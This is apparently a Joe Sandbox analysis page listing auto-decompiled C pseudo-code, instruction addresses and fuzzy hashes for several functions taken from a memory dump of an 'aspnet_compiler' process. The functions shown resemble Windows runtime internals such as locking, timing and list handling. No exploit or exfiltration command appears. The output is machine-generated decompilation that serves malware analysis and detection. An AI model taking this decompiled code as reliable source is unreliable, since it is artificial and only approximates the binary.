0x00000000
0x00000000
0x00000000
0x01102b4a
0x01102b4a
0x01102b4d
0x01102b53
0x00000000
0x00000000
0x01102b55
0x01102b58
0x01102bb7
0x01145d1b
0x01145d37
0x01145d47
0x01145d53
0x01102bbd
0x01102bbd
0x01102bbd
0x01102bb7
0x01102b5d
0x01102c2f
0x01145d5b
0x01145d77
0x01145d87
0x01145d93
0x01102c35
0x01102c35
0x01102c35
0x01102c2f
0x01102b65
0x01102b9f
0x01102ba2
0x01102b67
0x01102b67
0x01102b69
0x01102b6b
0x01102b6e
0x01102bc9
0x01102bcc
0x01102bcf
0x01102bd4
0x01102bd6
0x01102bd6
0x01102bdb
0x01102c02
0x01102c05
0x01102c07
0x00000000
0x01102c07
0x01102be0
0x01102c00
0x01102c3f
0x01102c3f
0x00000000
0x01102c00
0x01102be5
0x01102be7
0x01102bec
0x01102bf4
0x01102bf6
0x00000000
0x01102bf6
0x01102b70
0x01102b76
0x01102b2b
0x01102b2b
0x01102b2d
0x01102b2f
0x01102b32
0x01102b35
0x01102b3a
0x00000000
0x01102b40
0x01102b43
0x01102b45
0x01102b47
0x01102b4a
0x01102b4d
0x01102b53
0x00000000
0x00000000
0x00000000
0x01102b53
0x01102b78
0x01102b78
0x01102b7b
0x01102b7e
0x00000000
0x01102b7e
0x01102b76
0x01102ba5
0x01102ba5
0x01102ba8
0x01102bad
0x00000000
0x00000000
0x01102baf
0x01102baf
0x01102bc2
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75cfef20a78763aa3f3577715ec6603b05350e93dea4388b1ac2d6b3ff31ea4c
Instruction ID: c21f7be9bfb5cb7bf59be75c9d21fc4a70195eb4ceca69f97144b80125a82d1e
Opcode Fuzzy Hash: 75cfef20a78763aa3f3577715ec6603b05350e93dea4388b1ac2d6b3ff31ea4c
Instruction Fuzzy Hash: 1E510676F00525CFCB1DCF0CC4989BDB7B2FB8870071A845AE8569B395D774AA81C790

Uniqueness

Uniqueness Score: -1.00%

Function 0119AE44 Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0119AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0119C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0119ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0119FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0119EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E010F7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01191608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E011A1536(0x11c8ae4, (_t74 -  *0x11c8b04 >> 0x14) + (_t74 -  *0x11c8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0119C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0119A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0117CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0119ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x0119ae44
0x0119ae4c
0x0119ae53
0x0119ae55
0x0119ae5c
0x0119ae64
0x0119ae68
0x0119ae75
0x0119ae75
0x0119ae78
0x0119ae7a
0x0119ae7c
0x0119ae7f
0x0119aea8
0x0119aeab
0x0119aead
0x00000000
0x00000000
0x0119aeb3
0x0119aeb8
0x0119aebb
0x0119aebd
0x00000000
0x0119ae81
0x0119ae88
0x0119ae8f
0x0119ae9b
0x0119ae96
0x0119ae96
0x0119ae96
0x0119aea0
0x0119aea3
0x0119aebf
0x0119aebf
0x0119aec3
0x0119aec9
0x0119af0d
0x0119af14
0x0119af3d
0x0119af3d
0x0119af41
0x0119af44
0x0119af67
0x0119af67
0x0119af6a
0x0119afca
0x0119afd1
0x00000000
0x0119afd1
0x0119af6c
0x0119af6d
0x0119af75
0x0119af7c
0x0119af7e
0x0119af80
0x0119af85
0x0119af87
0x0119af99
0x0119af89
0x0119af92
0x0119af92
0x0119af9e
0x0119afa1
0x0119afa3
0x0119afa9
0x0119afb0
0x0119afb2
0x0119afb4
0x0119afbc
0x0119afbc
0x0119afb4
0x0119afb0
0x00000000
0x0119afa1
0x0119af4f
0x0119af57
0x0119af5c
0x0119af5e
0x00000000
0x00000000
0x0119af60
0x0119af64
0x0119af64
0x00000000
0x0119af64
0x0119af1a
0x0119af25
0x00000000
0x00000000
0x0119af27
0x0119af28
0x0119af33
0x00000000
0x0119aed0
0x0119aed0
0x0119aed2
0x0119aee1
0x0119aee4
0x00000000
0x00000000
0x0119aee6
0x0119aeec
0x00000000
0x00000000
0x0119aefb
0x0119af07
0x0119afd3
0x0119afdb
0x0119afdb
0x00000000
0x0119af07
0x0119aed6
0x0119aed8
0x0119aedf
0x00000000
0x00000000
0x00000000
0x0119aedf
0x0119aec9

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6a5c255fceac4dd9dedf26245d04b90abbf40c3fa59df1647b058e8888f18a
Instruction ID: c61de39cc56d0aa3038c5e06eb6b297ea43ca299dc47afa5fa44efa521f7a9c1
Opcode Fuzzy Hash: 9c6a5c255fceac4dd9dedf26245d04b90abbf40c3fa59df1647b058e8888f18a
Instruction Fuzzy Hash: 284117B17002215BDF2EDA2DE894B3FBB99EF84620F054218F936876D0DB34D809C692

Uniqueness

Uniqueness Score: -1.00%

Function 010FDBE9 Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E010FDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E010DCC50(E010D4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E010F7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E011A8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E010F2280(_t58, _v44);
						E010FDD82(_v44, _t102, _t98);
						E010FB944(_t102, _v5);
						return E010EFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x11c8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x11c862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x11c8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x11c862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x119fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x010fdbe9
0x010fdbf2
0x010fdbf7
0x010fdbf9
0x010fdbfc
0x010fdc00
0x010fdc03
0x010fdc14
0x010fdd54
0x010fdd54
0x010fdd54
0x010fdc18
0x010fdc1d
0x010fdc1d
0x010fdc32
0x010fdc3b
0x010fdc3e
0x010fdc46
0x010fdd5b
0x010fdd62
0x010fdd64
0x010fdd67
0x010fdd69
0x010fdd6b
0x010fdd6e
0x010fdd70
0x010fdd73
0x010fdd73
0x00000000
0x010fdc4c
0x010fdc4e
0x01143ae3
0x01143ae8
0x01143aea
0x010fdce7
0x010fdce9
0x010fdcec
0x010fdcee
0x010fdcf0
0x010fdcf3
0x010fdcf5
0x01143af2
0x01143af5
0x01143af5
0x010fdd06
0x010fdd08
0x010fdd0b
0x010fdd12
0x01143b08
0x010fdd18
0x010fdd18
0x010fdd18
0x010fdd20
0x010fdd23
0x01143b16
0x01143b16
0x010fdd29
0x010fdd2d
0x010fdd36
0x010fdd40
0x010fdd51
0x010fdd51
0x010fdc54
0x010fdc59
0x010fdc59
0x010fdc5e
0x010fdc5e
0x010fdc63
0x010fdc66
0x010fdc6b
0x010fdc78
0x010fdc7b
0x010fdc81
0x010fdc81
0x010fdc83
0x010fdc89
0x00000000
0x00000000
0x010fdd7b
0x010fdd7b
0x010fdc8f
0x010fdc8f
0x010fdc92
0x010fdc99
0x010fdc9f
0x010fdca5
0x010fdcaa
0x010fdcaa
0x010fdcb3
0x010fdcb8
0x010fdcbb
0x010fdcc1
0x010fdccf
0x010fdcd2
0x010fdcd5
0x010fdcd7
0x010fdcda
0x010fdcdc
0x010fdcdc
0x010fdce2
0x010fdce4
0x00000000
0x010fdce4

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb05fbd8325f74f09801009b7286a352cd727ba658e96117a2ff4e50b63689e3
Instruction ID: 84ff16df5d8388b1a9ba124c6b9c01a432a14101a32ce4f7c6e91783e70cf97d
Opcode Fuzzy Hash: eb05fbd8325f74f09801009b7286a352cd727ba658e96117a2ff4e50b63689e3
Instruction Fuzzy Hash: D651AD71A0121ADFCB18DFA8C491BAEBBF1BF48310F24815ED695E7785DB30A944CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010EEF40 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E010EEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E010D9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77d3c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E010D2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x010eef4b
0x010eef4d
0x010eef57
0x010ef0bd
0x010ef0c2
0x010ef0d2
0x010ef0d2
0x010ef0c2
0x010eef5d
0x010eef5f
0x010eef67
0x010eef6a
0x010eef6d
0x010eef74
0x010eef7f
0x010eef82
0x010eef82
0x010eef86
0x010eef88
0x010eef8c
0x010eef8f
0x010eef8f
0x010eef8f
0x00000000
0x010eef91
0x010eef93
0x010eefc4
0x010eefc4
0x010eefc4
0x010eefca
0x010eefd0
0x010ef0a6
0x00000000
0x00000000
0x010ef0af
0x0113bb06
0x0113bb0a
0x010ef0b5
0x010ef0b5
0x010ef0b5
0x010ef0b5
0x00000000
0x010eefd6
0x010eefd9
0x010ef0de
0x010ef0e2
0x010eefdf
0x010eefdf
0x010eefdf
0x010eefe5
0x0113bafc
0x0113bafc
0x010eefe5
0x010eefeb
0x010eefed
0x010ef00f
0x010ef011
0x010ef01a
0x010ef01d
0x010ef021
0x010ef028
0x010ef029
0x010ef029
0x010ef02c
0x00000000
0x010ef02c
0x010eeff3
0x010eeff9
0x010ef0ea
0x010ef0ed
0x010ef0ef
0x00000000
0x010ef0ef
0x010ef003
0x0113bb12
0x010ef045
0x010ef049
0x010ef051
0x010ef09e
0x010ef0a0
0x010ef0a0
0x010ef09e
0x010ef053
0x010ef064
0x010ef064
0x010ef06b
0x0113bb1a
0x0113bb1a
0x010ef071
0x010ef071
0x010ef07d
0x010ef082
0x010ef08f
0x010ef08f
0x010ef009
0x010ef00d
0x00000000
0x010ef00d
0x010eefd0
0x010eef97
0x010eefa5
0x010eefaa
0x00000000
0x010eefac
0x010eefac
0x010eefac
0x00000000
0x010eefb2
0x010ef036
0x010ef03a
0x010ef040
0x010ef090
0x00000000
0x010ef092
0x010ef042
0x00000000
0x010ef042
0x010eefb7
0x010eefb9
0x010eefbc
0x010eefb0
0x010eefb0
0x00000000
0x010eefbe
0x010eefbe
0x010eefc1
0x00000000
0x010eefc1
0x010eefbc
0x010eefaa
0x010eef91

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 3173b178d1a1008521d9dcc9d31e540d3a7710af74223e2eb0d0b6bc0aa15beb
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 3B510230A0424ADFEB65CB6AC0887EEBFF1AF45314F1881E9E58553282D375A989C751

Uniqueness

Uniqueness Score: -1.00%

Function 011A740D Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E011A740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0112D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0111F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L010F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L010F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0111F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L010F4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x011a740d
0x011a740d
0x011a7412
0x011a7413
0x011a7416
0x011a7418
0x011a741c
0x011a741f
0x011a7422
0x011a7422
0x011a7428
0x011a742a
0x011a742a
0x011a7451
0x011a7432
0x011a744f
0x011a744f
0x00000000
0x011a7434
0x011a7438
0x011a7443
0x011a7517
0x011a7517
0x011a751a
0x011a7535
0x011a7520
0x011a7527
0x011a752c
0x011a7531
0x011a7533
0x00000000
0x011a7533
0x00000000
0x011a7531
0x011a754b
0x011a754f
0x011a755c
0x011a755c
0x011a755f
0x011a7560
0x011a7561
0x011a7562
0x011a7563
0x011a7568
0x011a756a
0x011a756c
0x011a756d
0x011a756d
0x011a756f
0x011a7572
0x011a7574
0x011a7577
0x011a757c
0x011a757f
0x00000000
0x011a7551
0x011a7551
0x011a7551
0x011a7553
0x011a7553
0x011a7449
0x011a7449
0x011a744c
0x011a744c
0x00000000
0x011a744c
0x011a7443
0x011a750e
0x011a7514
0x011a7514
0x011a7455
0x011a7469
0x011a746d
0x00000000
0x011a7473
0x011a7473
0x011a7476
0x011a7480
0x011a7484
0x011a748e
0x011a7493
0x011a7493
0x011a7496
0x011a7499
0x011a74a1
0x011a74b1
0x011a74b5
0x00000000
0x011a74bb
0x011a74c1
0x011a74c1
0x011a74c4
0x011a74c5
0x011a74c6
0x011a74c7
0x011a74c8
0x011a74cd
0x00000000
0x011a74d3
0x011a74d3
0x011a74d6
0x011a74d8
0x011a74db
0x011a74dd
0x011a74e0
0x011a74e7
0x011a74ee
0x011a74ee
0x011a74f4
0x011a74f9
0x00000000
0x011a74fb
0x011a74fb
0x011a74fd
0x011a7500
0x011a7503
0x011a7505
0x011a7505
0x011a74f9
0x00000000
0x011a74cd
0x011a74b5
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: c6fc6dd523b58f5425ed59e21bbb79fc8c727a8befa38e7632d831fc3e21afb4
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: 94519C71600646EFDB1ACF18D480A96BBB5FF45304F5580AAE908DF252E372EA46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01102990 Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E01102990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x11aff00);
